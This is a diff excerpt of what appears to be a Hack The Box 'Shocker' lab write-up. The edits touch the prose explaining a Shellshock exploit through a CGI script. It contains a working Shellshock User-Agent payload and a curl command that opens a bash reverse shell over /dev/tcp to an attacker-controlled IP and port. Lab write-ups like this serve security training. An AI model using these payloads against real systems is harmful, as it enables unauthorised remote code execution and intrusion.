Jigsaws64/Jigsaws64.github.io/_posts/2024-07-20-HTB-Shocker.md

 url -H "User-Agent: () { :;}; echo; /bin/bash -c 'whoami'"
 ```

-- `() { :;}:` Defines a function in the User-Agent header
+- `() { :;}:` Defines a function in the User-Agent header (empty)
-- `/bin/bash -c 'id'` Part of the command that is executed by the vulnerable bash interpreter
+- `/bin/bash -c 'id'` The command that is executed by the vulnerable bash interpreter

 Since this sever is confirmed to be running an outdated version of bash, it will process our user-agent header as a function definition.
-This happens because bash **before the shellshock update** processes the user agent header as a function definition instead of plain
+This happens because bash (**before the shellshock update**) processes the user agent header as a function definition instead of plain text

 ![Shell Shocked](/assets/images/HTB%20-%20Shocker/Shell%20Shocked.png)

 We have RCE.
 Let's get our shell going.
-I'll start up my nc listener and perform the following curl request
+I'll start up my nc listener and perform the following curl request with the reverse shell one liner

 ```bash
 curl -H "User-Agent: () { :;}; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.36/9001 0>&1'" http://10.10.10.56/cgi-bin/user.sh
 ```

 ![Shell](/assets/images/HTB%20-%20Shocker/Shell.png)

 ## Privilege Escalation